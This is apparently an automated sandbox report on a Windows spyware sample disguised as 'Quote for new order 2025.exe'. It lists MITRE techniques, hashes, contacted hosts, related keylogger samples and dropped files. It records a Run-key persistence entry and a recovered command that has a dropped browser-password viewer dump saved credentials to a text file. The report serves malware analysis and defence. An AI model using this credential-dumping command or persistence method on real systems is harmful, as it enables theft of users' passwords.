Source: Yara match | File source: Process Memory Space: Quote for new order 2025.exe PID: 7396, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Chrom.exe PID: 7612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Chrom.exe PID: 7948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Chrom.exe PID: 1816, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\Chrom.exe, type: DROPPED
Mitre Att&ck Matrix

(A number before a technique name is the count of matching signatures; cells without a number are the matrix's default placeholders.)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 4 Obfuscated Files or Information | Security Account Manager | 17 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 111 Security Software Discovery | Distributed Component Object Model | 2 Clipboard Data | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph

Behavior Graph ID: 1586086
Sample: Quote for new order 2025.exe
Start date: 08/01/2025
Architecture: WINDOWS
Score: 84

Start (node 2)
  DNS/IP: mail.lmd.com.tr
  Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; 3 other signatures
  Quote for new order 2025.exe (node 8, badges 1 6) started
    DNS/IP: mail.lmd.com.tr 77.245.158.126, ports 49733, 49736, 49743, NIOBEBILISIMHIZMETLERITR Turkey
    Created file: C:\Users\user\Desktop\Chrom.exe, PE32 (dropped)
    cmd.exe (node 16, badge 1) started
      Chrom.exe (node 22, badge 14) started
        Signature: Multi AV Scanner detection for dropped file
      conhost.exe (node 25) started
  Quote for new order 2025.exe (node 12, badge 4) started
    cmd.exe (node 18) started
      Chrom.exe (node 27) started
        Signature: Tries to harvest and steal browser information (history, passwords, etc)
      conhost.exe (node 29) started
  Quote for new order 2025.exe (node 14, badge 4) started
    cmd.exe (node 20) started
      Chrom.exe (node 31, badge 1) started
      conhost.exe (node 33) started

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
Quote for new order 2025.exe | 61% | ReversingLabs | Win32.PUA.PassShow |
Quote for new order 2025.exe | 100% | Avira | TR/Spy.Gen |
Quote for new order 2025.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\Chrom.exe | 81% | ReversingLabs | Win32.PUA.PassView |

No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.lmd.com.tr | 77.245.158.126 | true | false | | unknown
                                                            high
                                                            http://www.sajatypeworks.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.typography.netDQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                    high
                                                                    http://www.galapagosdesign.com/staff/dennis.htmQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://maps.windows.com/windows-app-web-linkbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                        high
                                                                        https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                          high
                                                                          http://www.galapagosdesign.com/DPleaseQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                              high
                                                                              https://login.yahoo.com/config/loginChrom.exefalse
                                                                                high
                                                                                http://www.fonts.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.sandoll.co.krQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.urwpp.deDPleaseQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.nirsoft.net/Quote for new order 2025.exe, Chrom.exe.0.drfalse
                                                                                        high
                                                                                        http://www.zhongyicts.com.cnQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuote for new order 2025.exe, 00000000.00000002.3530691403.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3530288167.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.sakkal.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                high
                                                                                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                  high
                                                                                                  https://www.office.com/bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.comQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                          high
                                                                                                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            high
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://aefd.nelreports.net/api/report?cat=wsbbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                              high
                                                                                                              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.sakkal.comH4Quote for new order 2025.exe, 00000000.00000002.3539348359.0000000005D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.carterandcone.comlQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.founder.com.cn/cnQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlQuote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhv428D.tmp.14.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                          high
                                                                                                                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.jiyu-kobo.co.jp/Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.com/designers8Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                high
                                                                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhv428D.tmp.14.drfalse
                                                                                                                                  high
                                                                                                                                  https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/accounts/serviceloginChrom.exefalse
                                                                                                                                      high
                                                                                                                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                        high
                                                                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                          high
                                                                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drfalse
                                                                                                                                            high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
77.245.158.126 | mail.lmd.com.tr | Turkey | 42868 | NIOBEBILISIMHIZMETLERITR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586086
Start date and time: 2025-01-08 17:55:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Quote for new order 2025.exe
Detection: MAL
Classification: mal84.troj.spyw.winEXE@21/9@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 188
• Number of non-executed functions: 167
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.253.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Quote for new order 2025.exe
Time | Type | Description
16:56:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Application C:\Users\user\Desktop\Quote for new order 2025.exe
16:56:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Application C:\Users\user\Desktop\Quote for new order 2025.exe
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NIOBEBILISIMHIZMETLERITR | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 77.245.159.14
NIOBEBILISIMHIZMETLERITR | fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 77.245.159.14
NIOBEBILISIMHIZMETLERITR | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe | malicious | Snake Keylogger, VIP Keylogger | 77.245.159.14
NIOBEBILISIMHIZMETLERITR | hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | 77.245.159.27
NIOBEBILISIMHIZMETLERITR | https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL | malicious | Unknown | 77.245.159.9
NIOBEBILISIMHIZMETLERITR | PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | malicious | AgentTesla, PureLog Stealer | 77.245.148.65
NIOBEBILISIMHIZMETLERITR | Contract_Agreement_Wednesday September 2024.pdf | malicious | Unknown |
                                                                                                                                            • 77.245.159.9
                                                                                                                                            Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.9
                                                                                                                                            https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                                                                                                                            • 77.245.159.21
                                                                                                                                            No context
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            C:\Users\user\Desktop\Chrom.exe#U0417#U0430#U043f#U0440#U043e#U0441 #U041a#U041f.docx.scrGet hashmaliciousUnknownBrowse
                                                                                                                                              curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                  curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                    UDO_Device_Enrolment.exeGet hashmaliciousUnknownBrowse
Process: C:\Users\user\Desktop\Quote for new order 2025.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category: modified
Size (bytes): 94930
Entropy (8bit): 7.831770120257662
Encrypted: false
SSDEEP: 1536:CrPmU+oyiVAo4U4vXRvy61PXBMiV8FQtTF8CXSd4MwlYE06U3QsQYdVF8XtIb7nG:iPmU+oyiGvymXBVnTkd4MMx0fAsQibPe
MD5: 60EE647BDC5A1BB7107194E644E7DAFA
SHA1: 55D77C1B27DA1D675E3FC8A4380AB70EFC80D221
SHA-256: 800863C7EB04A70D9827908F9CC6C8C5B46FA711BF85DD8E747389894106E4FB
SHA-512: 095B623B1587062CC83F00BD3B5203076B1A9E77DB3B5E3729E4E96751232EAD531E5B53E62F0875EA64F29037475BB011315DED8793D38B95963A88AE364732
Malicious: false
Process: C:\Users\user\Desktop\Quote for new order 2025.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category: modified
Size (bytes): 107098
Entropy (8bit): 7.813359331794163
Encrypted: false
SSDEEP: 3072:iPmU+oyiGbJJJJJJJxh61oSTJYI8Srlvh+zskRFxVHv:iOUvG161oSmJSpvh+zRxVHv
MD5: 4C26E553CA78996A0D5FD4A202615D7C
SHA1: A9B7CEA0B49B8F285672095010652D7ABBD8980F
SHA-256: E36CEE5E257ED4EBE54861CFA1468D0A0A726C85528B6BA91CAF015F28597275
SHA-512: 3B04B177D228B9AAFFC0D334994141008622FC2A362EBA08F17D21A78C560D28DA9D1FE5E2BB3129F34016EF92A912F768E1FA9BEE6B6B5A9AF6A1615CD3E6C5
Malicious: false
Process: C:\Users\user\Desktop\Quote for new order 2025.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category: modified
Size (bytes): 90930
Entropy (8bit): 7.780603909006165
Encrypted: false
SSDEEP: 1536:CrP72ZgG8K7hkf2w333333kAnTRKgADdgWEflequnZAR4VpkPGL85wfRB/U7/Oyg:iPyPhkp333333kyvKdueqWAR4TSf4P/L
MD5: 0F312231AA8866F93095F106477F0A11
SHA1: 420C157B6266063692D8B2E27FDF2ADA5DB3D8FF
SHA-256: 2C22A14F2053EBF6EF962BA56924E540B34891907CC56A616D0B9F94B8624590
SHA-512: 151371B9C3B83D723063E805298FC9D9631AEE726643F4FF00E05FDA88BA3601A759C8FEABDFDE0E06EFD7AB5CAF9791EADE035488B4ACD6197CCFA57B725FE3
Malicious: false
Process: C:\Users\user\Desktop\Chrom.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x71e1834d, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 20447232
Entropy (8bit): 1.2841567855363691
Encrypted: false
SSDEEP: 12288:BeUx0oGF76K/OfvWDn2b+Sl5c4FxHoprt:WoGggD8+
MD5: A9EDC7F53A2D3E2EED81A50292DB552B
SHA1: 1198A665FFACA3DDBC35250A544B091F482193AF
SHA-256: C5B33E7659706BDAED4823503BC1FB7E0AEDFD8EFFBB3825944E13D274341519
SHA-512: 2A93E249DBC17C6606A02E67C9E6E1F60E173C2D38403170EF24D54AE30FD33FA3BD369D4F855841013A554160421AB8D9AFE67E5213D64EC6C52CF3A56BE2A7
Malicious: false
Process: C:\Users\user\Desktop\Chrom.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xefee132b, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 20447232
Entropy (8bit): 1.2841577906876318
Encrypted: false
SSDEEP: 12288:5eUxKoGF76K/OfvWDn2b+Sl5c4FxHoprt:0oGggD8+
MD5: 9ECBC01A0A684D6CD941983CDBD868B4
SHA1: BAE56A16D08B2CDB9EB85D130232A3F7F22E28A9
SHA-256: 3617CCD13BE608C5904CC03D58F86C60B21D7AEF9A694B4F1A8D9A4948203FC6
SHA-512: C0C2446928CBCD208A40C6C4CDB6CADC86DB07DE1EC54A67D8E4F4574629F70D53AED659EBFD5F8A4FD65DA6253D536C87AEDDDC887E3E485E7C8706579A7656
Malicious: false
Process: C:\Users\user\Desktop\Chrom.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
Entropy (8bit): 0.10805027086476268
Encrypted: false
SSDEEP: 1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
MD5: 9F6FBA8CABF6D4ECDD5B285F375D352B
SHA1: ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
SHA-256: 4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
SHA-512: 75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
Malicious: false
Process: C:\Users\user\Desktop\Quote for new order 2025.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 402944
Entropy (8bit): 6.666814366272581
Encrypted: false
SSDEEP: 6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
MD5: 2024EA60DA870A221DB260482117258B
SHA1: 716554DC580A82CC17A1035ADD302C0766590964
SHA-256: 53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
SHA-512: FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\Desktop\Chrom.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 81%
Joe Sandbox View:
• Filename: #U0417#U0430#U043f#U0440#U043e#U0441 #U041a#U041f.docx.scr, Detection: malicious, Browse
• Filename: curriculum_vitae-copie.vbs, Detection: malicious, Browse
• Filename: curriculum_vitae-copie_(1).vbs, Detection: malicious, Browse
• Filename: curriculum_vitae-copie.vbs, Detection: malicious, Browse
• Filename: UDO_Device_Enrolment.exe, Detection: malicious, Browse
Process: C:\Users\user\Desktop\Chrom.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
                                                                                                                                                      Preview:..
                                                                                                                                                      Process:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):33
                                                                                                                                                      Entropy (8bit):3.8013774524295485
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FnGwOts:ods
                                                                                                                                                      MD5:AB9CCDFF55A9BE4B55EC1560B01447B5
                                                                                                                                                      SHA1:DBF1A7C20E78B1156BA5A1F4F9F45757582D7542
                                                                                                                                                      SHA-256:2B90B9D067A6EA1795075872E83A75DDC2B69A59F51D004DFF13ED97693AF18B
                                                                                                                                                      SHA-512:5966B3B8E2F20699DFBD9CC7B26B2450BE4313CE264A43342D975420662C8614B3F0EA0230ABB63CAF2BC003921CCF168EA4C6BD09A8B9179DA62B71549C569D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.\Chrom.exe /stext .\output.txt..
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):6.993617871655389
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • InstallShield setup (43055/19) 0.21%
                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                      File name:Quote for new order 2025.exe
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5:11de9d1bb135adb354e26bdad47037c9
                                                                                                                                                      SHA1:5fbeaf0df88266d5562da5c5f28ccd80e08f349b
                                                                                                                                                      SHA256:9285b4abeb09d675bc06b47444261c1f0034613d08b44b69c99c8ef63b1cfa72
                                                                                                                                                      SHA512:06c81c0bd9a7fad58c35cc608deb8e9c9cd1adebff271df9f4be1038cac104a9521dbb13bb0e4941795400c47bb35476ac9596928daf57d677270958e9a7731b
                                                                                                                                                      SSDEEP:12288:rIsTP2PSDRSm3vrugB9KvKk9RO8k3hTP2:tTuPS53v6gByKk9ROHhTu
                                                                                                                                                      TLSH:B7C4BF02F3D18036E5AB013207BA6772DEF6BE201635D6670BC51A89AE715D1EB3E743
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."S..........."...P.................. ........@.. ....................................`................................
                                                                                                                                                      Icon Hash:71716ccc9e15152b
                                                                                                                                                      Entrypoint:0x47ccde
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0xBB5322FD [Sat Aug 3 20:37:17 2069 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                      Instruction
